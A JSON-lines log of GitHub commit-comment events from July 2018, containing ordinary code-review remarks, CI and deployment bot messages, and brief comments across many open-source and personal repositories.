{"id":"7913336608","type":"CommitCommentEvent","actor":{"login":"veraposthumus"},"repo":{"name":"veraposthumus/website"},"payload":{"comment":{"id":29582957,"position":13,"line":84,"path":"index.css","commit_id":"bd99580e5510839ad4548a3746fcb1d7672f661b","created_at":"2018-07-03T15:28:16Z","updated_at":"2018-07-03T15:28:16Z","author_association":"OWNER","body":"color: #000"}},"created_at":"2018-07-03T15:28:16Z"}
{"id":"7913338927","type":"CommitCommentEvent","actor":{"login":"le-jzr"},"repo":{"name":"HelenOS/helenos"},"payload":{"comment":{"id":29582964,"position":4,"line":219,"path":"tools/ew.py","commit_id":"2fc9bfdff4f7f7961c56c7e4f3521ee05f4582e8","created_at":"2018-07-03T15:28:39Z","updated_at":"2018-07-03T15:28:39Z","author_association":"CONTRIBUTOR","body":"Hmm, is it okay to just remove the `-serial stdio` from architectures that used it before?"}},"created_at":"2018-07-03T15:28:39Z"}
{"id":"7913340734","type":"CommitCommentEvent","actor":{"login":"pedrofracassi"},"repo":{"name":"SwitchbladeBot/switchblade"},"payload":{"comment":{"id":29582968,"position":13,"line":13,"path":"src/commands/misc/dicksize.js","commit_id":"1e59f7383fbc90c5037fb975a0f7e25d291c879c","created_at":"2018-07-03T15:28:55Z","updated_at":"2018-07-03T15:28:55Z","author_association":"MEMBER","body":"You don't have to use await here"}},"created_at":"2018-07-03T15:28:55Z"}
{"id":"7913341578","type":"CommitCommentEvent","actor":{"login":"pedrofracassi"},"repo":{"name":"SwitchbladeBot/switchblade"},"payload":{"comment":{"id":29582971,"position":10,"line":10,"path":"src/commands/misc/dicksize.js","commit_id":"1e59f7383fbc90c5037fb975a0f7e25d291c879c","created_at":"2018-07-03T15:29:05Z","updated_at":"2018-07-03T15:29:05Z","author_association":"MEMBER","body":"You also don't need to use async here"}},"created_at":"2018-07-03T15:29:05Z"}
{"id":"7913344170","type":"CommitCommentEvent","actor":{"login":"pedrofracassi"},"repo":{"name":"SwitchbladeBot/switchblade"},"payload":{"comment":{"id":29582974,"position":14,"line":14,"path":"src/commands/misc/dicksize.js","commit_id":"1e59f7383fbc90c5037fb975a0f7e25d291c879c","created_at":"2018-07-03T15:29:29Z","updated_at":"2018-07-03T15:29:29Z","author_association":"MEMBER","body":"This needs to be translatable. Check the other commands to see how it works."}},"created_at":"2018-07-03T15:29:29Z"}
{"id":"7913348498","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29582983,"position":156,"line":363,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:30:11Z","updated_at":"2018-07-03T15:30:11Z","author_association":"CONTRIBUTOR","body":"I would declare `bool use_vcol_first` only after the `retry_purge_sec:` label, together with the real initialization.\r\nThe initialization to `false` is redundant, as it would always be overwritten by the assignment."}},"created_at":"2018-07-03T15:30:11Z"}
{"id":"7913349479","type":"CommitCommentEvent","actor":{"login":"nitzan2611"},"repo":{"name":"nitzan2611/Jagent"},"payload":{"comment":{"id":29582986,"position":136,"line":130,"path":"src/agent/Agent.java","commit_id":"a09a18e6a1a6c628814d9eb4e929910574daf159","created_at":"2018-07-03T15:30:19Z","updated_at":"2018-07-03T15:30:19Z","author_association":"OWNER","body":"Hi matan, this is where you need to do \r\nnotice that i have made a method called executeCommand that receives command and returns the output, "}},"created_at":"2018-07-03T15:30:19Z"}
{"id":"7913355859","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29582998,"position":null,"line":null,"path":null,"commit_id":"2f7fbae016efabe44b69740f42674b44cc088952","created_at":"2018-07-03T15:31:20Z","updated_at":"2018-07-03T15:31:20Z","author_association":"OWNER","body":"Combination of technologies for space exploration through folding space and teleportation Photon Antimatter Propulsion Annialation for energy Positron Rockets\r\nSee video Andy Wood Positron Dynamics"}},"created_at":"2018-07-03T15:31:20Z"}
{"id":"7913358933","type":"CommitCommentEvent","actor":{"login":"Shubha777"},"repo":{"name":"Shubha777/learningpython"},"payload":{"comment":{"id":29583013,"position":null,"line":null,"path":null,"commit_id":"cfa887d5cd1e98d663a6a03e9c4546ddcdb5e6ae","created_at":"2018-07-03T15:31:49Z","updated_at":"2018-07-03T15:31:49Z","author_association":"OWNER","body":"I am updating the code. "}},"created_at":"2018-07-03T15:31:49Z"}
{"id":"7913363135","type":"CommitCommentEvent","actor":{"login":"jsmartin72"},"repo":{"name":"CenturyLinkCloud/PublicKB"},"payload":{"comment":{"id":29583025,"position":null,"line":null,"path":null,"commit_id":"2bff0f5e99ba2a519715a206bb3243e529b9dc94","created_at":"2018-07-03T15:32:29Z","updated_at":"2018-07-03T15:32:29Z","author_association":"NONE","body":"Updated engagement of TAM based on internal processes."}},"created_at":"2018-07-03T15:32:29Z"}
{"id":"7913363652","type":"CommitCommentEvent","actor":{"login":"king4k1"},"repo":{"name":"king4k1/kma-ggplot"},"payload":{"comment":{"id":29583026,"position":null,"line":null,"path":null,"commit_id":"32a7b2391f2040314a1adeaefa7b5ec410d0e2ec","created_at":"2018-07-03T15:32:34Z","updated_at":"2018-07-03T15:32:34Z","author_association":"OWNER","body":"\r\n서울시 위도 경도 데이터\r\n\r\n```{r}\r\n[ll.zip](https://github.com/king4k1/kma-ggplot/files/2160025/ll.zip)\r\n\r\nsg <- dat17%>%filter(si==\"서울특별시\"|si==\"경기도\")\r\nll <- fread(file=\"ll.csv\")\r\nsg$dong\r\nsg <- full_join(sg,ll)\r\nhead(sg)\r\n```"}},"created_at":"2018-07-03T15:32:34Z"}
{"id":"7913366021","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29583032,"position":176,"line":381,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:32:57Z","updated_at":"2018-07-03T15:32:57Z","author_association":"CONTRIBUTOR","body":"Did you mean `*sec_pcur = NULL`? `sec_pcur` is passed by value, not reference, so the caller cannot see any effect of the assignment."}},"created_at":"2018-07-03T15:32:57Z"}
{"id":"7913366539","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29583033,"position":null,"line":null,"path":null,"commit_id":"292ff84e2253d77efaff906151dde786709eab39","created_at":"2018-07-03T15:33:01Z","updated_at":"2018-07-03T15:33:01Z","author_association":"NONE","body":"Yep, major improvement for NBA 2K."}},"created_at":"2018-07-03T15:33:01Z"}
{"id":"7913377749","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29583058,"position":187,"line":393,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:34:47Z","updated_at":"2018-07-03T15:34:47Z","author_association":"CONTRIBUTOR","body":"Do we need the `sec_pcur` parameter separately from `node->sec_pcur`?\r\nI would like to move the first condition of `row_purge_restore_vsec_cur()` here, or rename the function to something that makes it clearer what is going on."}},"created_at":"2018-07-03T15:34:47Z"}
{"id":"7913381994","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29583071,"position":null,"line":null,"path":null,"commit_id":"57c5c404438eafa5a11a4739083758bdbeeaca17","created_at":"2018-07-03T15:35:28Z","updated_at":"2018-07-03T15:35:28Z","author_association":"COLLABORATOR","body":"Done in 31927664"}},"created_at":"2018-07-03T15:35:28Z"}
{"id":"7913382926","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"cglib/cglib"},"payload":{"comment":{"id":29583072,"position":null,"line":null,"path":null,"commit_id":"e31ca2f1e514b2db3f017b1534b2271439bd0d3b","created_at":"2018-07-03T15:35:37Z","updated_at":"2018-07-03T15:35:37Z","author_association":"NONE","body":"@sameb 3.2.7 coming to central Maven soon?"}},"created_at":"2018-07-03T15:35:37Z"}
{"id":"7913383211","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29583073,"position":197,"line":352,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:35:40Z","updated_at":"2018-07-03T15:35:40Z","author_association":"CONTRIBUTOR","body":"There is no need to move this assignment. If you like, we could remove the redundant variable `btr_cur` altogether, and just refer to `pcur.btr_cur`."}},"created_at":"2018-07-03T15:35:40Z"}
{"id":"7913384027","type":"CommitCommentEvent","actor":{"login":"poppabear8883"},"repo":{"name":"HDInnovations/UNIT3D"},"payload":{"comment":{"id":29583077,"position":30,"line":177,"path":"app/Http/Controllers/AnnounceController.php","commit_id":"4b938d2e5eca61b9abbeff4587fa04fe285baef3","created_at":"2018-07-03T15:35:48Z","updated_at":"2018-07-03T15:35:48Z","author_association":"COLLABORATOR","body":"I am confused by this ?"}},"created_at":"2018-07-03T15:35:48Z"}
{"id":"7913384375","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"MinkoJ2/Related-To-Testing-Article"},"payload":{"comment":{"id":29583079,"position":9,"line":9,"path":"readme.txt","commit_id":"6a6330bfa6e7be347a3c0783e867e134bdf20e17","created_at":"2018-07-03T15:35:52Z","updated_at":"2018-07-03T15:35:52Z","author_association":"COLLABORATOR","body":"async"}},"created_at":"2018-07-03T15:35:52Z"}
{"id":"7913385385","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"MinkoJ2/Related-To-Testing-Article"},"payload":{"comment":{"id":29583082,"position":18,"line":18,"path":"readme.txt","commit_id":"6a6330bfa6e7be347a3c0783e867e134bdf20e17","created_at":"2018-07-03T15:36:02Z","updated_at":"2018-07-03T15:36:02Z","author_association":"COLLABORATOR","body":"use strict"}},"created_at":"2018-07-03T15:36:02Z"}
{"id":"7913385542","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29583083,"position":null,"line":null,"path":null,"commit_id":"f7309853ac516dbefaec608c3a339b1049fd2c4d","created_at":"2018-07-03T15:36:03Z","updated_at":"2018-07-03T15:36:03Z","author_association":"CONTRIBUTOR","body":"The classic ui is also buggy in dpup, i wonder why. having more than one ui makes the code more confusing..\r\n\r\nA few weeks ago i was looking at some screen shots, package managers usually have only  2 \"panels\", the ppm had 3, it was also obvious that when you click on a package.. the pkg info is displayed. My bro uses a very basic & primitive frontend for pacman in arch linux and he doesn't look sad because of that..\r\n\r\nThat inspired me to make the changes you can see here, i borrowed some code from pupkview\r\n[petget.zip](https://github.com/puppylinux-woof-CE/woof-CE/files/2160004/petget.zip)\r\n\r\nThey call it \"proof of concept\". Once i got something working i moved onto something else.\r\n\r\nHowever, more info should be displayed\r\n\r\nDependencies :\r\nHomepage :\r\nFilename :\r\nLocation :\r\n\r\nBut i see that requires some \"heavier\" changes ..\r\n\r\nAnd the most important part, the 'disentangle petget from the gui' thing truly requires a very basic GUI frontend for a cli app, something that will probably never be achieved with the PPM.."}},"created_at":"2018-07-03T15:36:03Z"}
{"id":"7913389714","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29583091,"position":null,"line":null,"path":null,"commit_id":"03f9f93c44700ab429d0e63e9083a00fe08d9364","created_at":"2018-07-03T15:36:44Z","updated_at":"2018-07-03T15:36:44Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2930 of 2930 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-03T15:36:44Z"}
{"id":"7913392213","type":"CommitCommentEvent","actor":{"login":"johanngoltz"},"repo":{"name":"johanngoltz/sumz-ui"},"payload":{"comment":{"id":29583100,"position":42,"line":116,"path":"src/app/scenario-detail/scenario-detail.component.ts","commit_id":"0303d4df35584bb1fff786dc6952a616c8e5e899","created_at":"2018-07-03T15:37:10Z","updated_at":"2018-07-03T15:37:10Z","author_association":"OWNER","body":"Lässt sich gut als `!!config.showResult.cvd` abkürzen"}},"created_at":"2018-07-03T15:37:10Z"}
{"id":"7913397004","type":"CommitCommentEvent","actor":{"login":"synolia-bvo"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29583109,"position":5,"line":309,"path":"app/code/Magento/CatalogInventory/Model/ResourceModel/Indexer/Stock/DefaultStock.php","commit_id":"622008ce3eb0f197fc97de5aa69e9ce1fd4db5e3","created_at":"2018-07-03T15:37:57Z","updated_at":"2018-07-03T15:37:57Z","author_association":"NONE","body":"Ok thanks !"}},"created_at":"2018-07-03T15:37:57Z"}
{"id":"7913397354","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"rougier/freetype-py"},"payload":{"comment":{"id":29583110,"position":15,"line":74,"path":"appveyor.yml","commit_id":"7456fb843a32a12ae6cfbf5c1cc8a5ab055d9dee","created_at":"2018-07-03T15:38:01Z","updated_at":"2018-07-03T15:38:01Z","author_association":"CONTRIBUTOR","body":"--upgrade would have been better IMO, but this should work (at least until Appveyor does not come with twine preinstalled). We want to use the latest and greatest"}},"created_at":"2018-07-03T15:38:01Z"}
{"id":"7913400221","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29583119,"position":236,"line":671,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:38:28Z","updated_at":"2018-07-03T15:38:28Z","author_association":"CONTRIBUTOR","body":"This condition is duplicated later in the function. Can we declare a member function for this condition? Preferrably one with a descriptive name. The `vcol_info` is not very descriptive. Something like this:\r\n```c++\r\nbool some_name() const\r\n{\r\n\treturn is_vcol_info_exist() && !validate_vcol_info();\r\n}\r\n```\r\nPlease replace the names `is_*_exist()` with `*_exists()`, for better English grammar."}},"created_at":"2018-07-03T15:38:28Z"}
{"id":"7913401976","type":"CommitCommentEvent","actor":{"login":"kiran12-av"},"repo":{"name":"kiran12-av/TEST"},"payload":{"comment":{"id":29583122,"position":null,"line":null,"path":null,"commit_id":"b242e79be33beb932cf3855a0ce4971f19e7219d","created_at":"2018-07-03T15:38:45Z","updated_at":"2018-07-03T15:38:45Z","author_association":"OWNER","body":"not needed "}},"created_at":"2018-07-03T15:38:45Z"}
{"id":"7913402323","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"winstonjs/winston-daily-rotate-file"},"payload":{"comment":{"id":29583124,"position":4,"line":153,"path":"daily-rotate-file.js","commit_id":"3d8674f340632c4422eaf2dbc31a80107f7bdd6a","created_at":"2018-07-03T15:38:49Z","updated_at":"2018-07-03T15:38:49Z","author_association":"NONE","body":"Uhm yeah but it'S working correctly in version 1.7.2. We never had a chance to move forward with newer versions. Is it something you're willing to revisit in the future? I can probably put a few hours in order to make non json logs happy again. "}},"created_at":"2018-07-03T15:38:49Z"}
{"id":"7913405118","type":"CommitCommentEvent","actor":{"login":"AJvanLoon"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29583131,"position":null,"line":null,"path":null,"commit_id":"c2341f93a537b2671c2948b9804a523d7b258d45","created_at":"2018-07-03T15:39:16Z","updated_at":"2018-07-03T15:39:16Z","author_association":"CONTRIBUTOR","body":"Forgot to mention @arturi :)"}},"created_at":"2018-07-03T15:39:16Z"}
{"id":"7913408313","type":"CommitCommentEvent","actor":{"login":"keithparkerart"},"repo":{"name":"lukeplaisance/Unity-Production-VC"},"payload":{"comment":{"id":29583135,"position":null,"line":null,"path":null,"commit_id":"ad95ee78ea4106f462fdf760bd68a2d888917548","created_at":"2018-07-03T15:39:47Z","updated_at":"2018-07-03T15:39:47Z","author_association":"COLLABORATOR","body":"@chuwilliamson  OK"}},"created_at":"2018-07-03T15:39:47Z"}
{"id":"7913409056","type":"CommitCommentEvent","actor":{"login":"Y-k-Y"},"repo":{"name":"Y-k-Y/WBS"},"payload":{"comment":{"id":29583137,"position":null,"line":null,"path":null,"commit_id":"749aade86c28142aab49715b906b8eacf404c7c6","created_at":"2018-07-03T15:39:54Z","updated_at":"2018-07-03T15:39:54Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-03T15:39:54Z"}
{"id":"7913409281","type":"CommitCommentEvent","actor":{"login":"jayeshpal"},"repo":{"name":"jayeshpal/html"},"payload":{"comment":{"id":29583139,"position":34,"line":34,"path":"README.md","commit_id":"e07d2ea400f4f13115ab531c9ffd5545bcda976b","created_at":"2018-07-03T15:39:56Z","updated_at":"2018-07-03T15:39:56Z","author_association":"OWNER","body":"<html>\r\n<head>\r\n<tittle></tittle>\r\n</head>\r\n<body>\r\n<table border=\"1\" align=\"center\">\r\n<form>\r\n<tr>\r\n<th>NAME</th>\r\n<th><input type=\"text\" name=\"lastname\"></th>\r\n</tr>\r\n<tr>\r\n<th>ADDRESS</th>\r\n<th><textarea name=\"message\" rows=\"10\" cols=\"30\"></textarea></th>\r\n</tr>\r\n<tr>\r\n<th>CITY</th>\r\n<th><select name=\"city\" size=\"1\">\r\n  <option value=\"NOIDA\">NOIDA</option>\r\n  <option value=\"DELHI\">DELHI</option>\r\n  <option value=\"GHAZIABAD\">GHAZIABAD</option>\r\n  <option value=\"GOA\">GOA</option>\r\n</select></th>\r\n</tr>\r\n<tr>\r\n<th>GENDER</th>\r\n<th><input type=\"radio\" name=\"gender\" value=\"male\" checked> Male\r\n  <input type=\"radio\" name=\"gender\" value=\"female\"> Female\r\n  <input type=\"radio\" name=\"gender\" value=\"other\"> Other\r\n</th>\r\n\r\n\r\n\r\n\r\n<tr>\r\n<th></th><th><input type =\"BUTTON\" name=\"password\" value =\"SUBMIT\">\r\n<input type =\"RESET\" name=\"password\" value =\"CLEAR\"></th>\r\n</tr>\r\n</body>\r\n</html>"}},"created_at":"2018-07-03T15:39:56Z"}
{"id":"7913410458","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29583140,"position":19,"line":96,"path":"storage/innobase/row/row0purge.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T15:40:10Z","updated_at":"2018-07-03T15:40:10Z","author_association":"CONTRIBUTOR","body":"Where is the `mem_heap_free()` for `vcol_heap`? I only see a `mem_heap_empty()`."}},"created_at":"2018-07-03T15:40:10Z"}
{"id":"7913411832","type":"CommitCommentEvent","actor":{"login":"scttmcvy"},"repo":{"name":"scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434"},"payload":{"comment":{"id":29583143,"position":null,"line":null,"path":null,"commit_id":"01f0885583f267a18262e70fdc91a6fd2eb8f4b9","created_at":"2018-07-03T15:40:23Z","updated_at":"2018-07-03T15:40:23Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/7b7fd12f-c3a6-4928-b531-f17b18d632e4?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180703123746434\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/79ab610f-61d7-4153-bcbf-d27d4568e6ff?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180703123746434\") deployed [sample-cloud-native-toolchain-tutorial-20180703123746434](https://github.com/scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434/releases/tag/deploy-ibm-yp-eu-gb-scott.mcavoy-test-20180703-154016 \"deploy-ibm-yp-eu-gb-scott.mcavoy-test-20180703-154016\") to [test](https://console.bluemix.net/apps/14a4e7a1-ef2e-422c-a229-780fbcd3c0ee?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:scott.mcavoy:test\"), including this commit"}},"created_at":"2018-07-03T15:40:23Z"}
{"id":"7913414017","type":"CommitCommentEvent","actor":{"login":"barbiagus22"},"repo":{"name":"Faa93/CursoIngresoJS"},"payload":{"comment":{"id":29583149,"position":null,"line":null,"path":null,"commit_id":"f59ec08ed50d4f9d6bd1b5203425739ae1f67fd2","created_at":"2018-07-03T15:40:44Z","updated_at":"2018-07-03T15:40:44Z","author_association":"NONE","body":"// Consulta chicos, estoy intentando descargar los programas a mi pc, pero no se como o de donde descargar el archivo zip para exportarlo a sublime text y de ahí poder realizar las actividades de la pagina. De donde lo saco? "}},"created_at":"2018-07-03T15:40:44Z"}
{"id":"7913417894","type":"CommitCommentEvent","actor":{"login":"solelo"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29583153,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-03T15:41:21Z","updated_at":"2018-07-03T15:41:21Z","author_association":"NONE","body":"I added replaced the snipped of code and date is still stuck."}},"created_at":"2018-07-03T15:41:21Z"}
{"id":"7913419187","type":"CommitCommentEvent","actor":{"login":"BCollinsXPO"},"repo":{"name":"BCollinsXPO/greetings-earthlings"},"payload":{"comment":{"id":29583158,"position":null,"line":null,"path":null,"commit_id":"e181aad441bd9940a649b94f99b61bdea07efc13","created_at":"2018-07-03T15:41:34Z","updated_at":"2018-07-03T15:41:34Z","author_association":"OWNER","body":"This is my first comment."}},"created_at":"2018-07-03T15:41:34Z"}
{"id":"7913421291","type":"CommitCommentEvent","actor":{"login":"b-s-d"},"repo":{"name":"Jazaret/Nancy"},"payload":{"comment":{"id":29583162,"position":null,"line":null,"path":null,"commit_id":"e6e61719309754654970a0b79900a5b4e2d065c3","created_at":"2018-07-03T15:41:55Z","updated_at":"2018-07-03T15:41:55Z","author_association":"NONE","body":"Awesome."}},"created_at":"2018-07-03T15:41:55Z"}
{"id":"7913424449","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583167,"position":null,"line":null,"path":null,"commit_id":"85777632d09a07ff56b3e96fd96682934eec6a90","created_at":"2018-07-03T15:42:26Z","updated_at":"2018-07-03T15:42:26Z","author_association":"NONE","body":"Very nice, looks good!"}},"created_at":"2018-07-03T15:42:26Z"}
{"id":"7913425006","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29583169,"position":null,"line":null,"path":null,"commit_id":"2f7fbae016efabe44b69740f42674b44cc088952","created_at":"2018-07-03T15:42:32Z","updated_at":"2018-07-03T15:42:32Z","author_association":"OWNER","body":"SA-1 Antimatter Space Plane building and testing\r\nhttps://m.youtube.com/watch?v=tgvYmgjcMZY"}},"created_at":"2018-07-03T15:42:32Z"}
{"id":"7913427704","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29583176,"position":null,"line":null,"path":null,"commit_id":"03f9f93c44700ab429d0e63e9083a00fe08d9364","created_at":"2018-07-03T15:42:57Z","updated_at":"2018-07-03T15:42:57Z","author_association":"NONE","body":"158538153-Maximum-Curve-Output-is-always-ignored-#6365 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1682 of 1682 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-03f9f93c44700ab429d0e63e9083a00fe08d9364-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-03T15:42:57Z"}
{"id":"7913430685","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583179,"position":4,"line":23,"path":"docs/tutorials/try-echo-service.rst","commit_id":"05571d4df15e10b82d46da3364ec095e76ca0b26","created_at":"2018-07-03T15:43:27Z","updated_at":"2018-07-03T15:43:27Z","author_association":"NONE","body":"please add that the ownership rights of that file need to be specified to the owner alone"}},"created_at":"2018-07-03T15:43:27Z"}
{"id":"7913433928","type":"CommitCommentEvent","actor":{"login":"scttmcvy"},"repo":{"name":"scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434"},"payload":{"comment":{"id":29583184,"position":null,"line":null,"path":null,"commit_id":"01f0885583f267a18262e70fdc91a6fd2eb8f4b9","created_at":"2018-07-03T15:44:00Z","updated_at":"2018-07-03T15:44:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/7b7fd12f-c3a6-4928-b531-f17b18d632e4?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180703123746434\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/79ab610f-61d7-4153-bcbf-d27d4568e6ff?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180703123746434\") deployed [sample-cloud-native-toolchain-tutorial-20180703123746434](https://github.com/scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434/releases/tag/deploy-ibm-yp-eu-gb-scott.mcavoy-prod-20180703-154359 \"deploy-ibm-yp-eu-gb-scott.mcavoy-prod-20180703-154359\") to [prod](https://console.bluemix.net/apps/ec735dd2-8eab-4b81-b0ac-e4bd649fdb26?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:scott.mcavoy:prod\"), including this commit"}},"created_at":"2018-07-03T15:44:00Z"}
{"id":"7913434125","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583185,"position":null,"line":null,"path":null,"commit_id":"05571d4df15e10b82d46da3364ec095e76ca0b26","created_at":"2018-07-03T15:44:02Z","updated_at":"2018-07-03T15:44:02Z","author_association":"NONE","body":"good catch, please delete"}},"created_at":"2018-07-03T15:44:02Z"}
{"id":"7913436706","type":"CommitCommentEvent","actor":{"login":"ngph1"},"repo":{"name":"ngph1/sample-cloud-native-toolchain-tutorial-20180702091319609"},"payload":{"comment":{"id":29583190,"position":null,"line":null,"path":null,"commit_id":"5e403e7f0409adee1eef3c092ba9a8b2c1bb0a66","created_at":"2018-07-03T15:44:27Z","updated_at":"2018-07-03T15:44:27Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ada15128-1189-488e-a2d8-e35d9e878577?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180702091319609\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/fc2b99ed-f195-4a70-9b20-62316c9f9855?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180702091319609\") deployed [sample-cloud-native-toolchain-tutorial-20180702091319609](https://github.com/ngph1/sample-cloud-native-toolchain-tutorial-20180702091319609/releases/tag/deploy-ibm-yp-us-south-PH-DP-Org-test-20180703-154426 \"deploy-ibm-yp-us-south-PH-DP-Org-test-20180703-154426\") to [test](https://console.bluemix.net/apps/1e5c6573-0d6a-4d8f-9022-2fa54d20aacf?env_id=ibm:yp:us-south \"ibm:yp:us-south:PH DP Org:test\"), including this commit"}},"created_at":"2018-07-03T15:44:27Z"}
{"id":"7913440815","type":"CommitCommentEvent","actor":{"login":"coffeedogs"},"repo":{"name":"Bitmessage/PyBitmessage"},"payload":{"comment":{"id":29583206,"position":26,"line":84,"path":"src/workprover/__init__.py","commit_id":"c28a4f6174419ab3d58a7c84482dcdc895182ad8","created_at":"2018-07-03T15:45:07Z","updated_at":"2018-07-03T15:45:07Z","author_association":"COLLABORATOR","body":"`status` seems like a poor choice of variable name here. Perhaps by the time I've finished the review it will make more sense."}},"created_at":"2018-07-03T15:45:07Z"}
{"id":"7913443230","type":"CommitCommentEvent","actor":{"login":"Dominik1999"},"repo":{"name":"krisnaer/microraiden"},"payload":{"comment":{"id":29583215,"position":null,"line":null,"path":null,"commit_id":"81e54443c50c14754bc10baa1dd44af906554394","created_at":"2018-07-03T15:45:31Z","updated_at":"2018-07-03T15:45:31Z","author_association":"NONE","body":"nice, changes accepted"}},"created_at":"2018-07-03T15:45:31Z"}
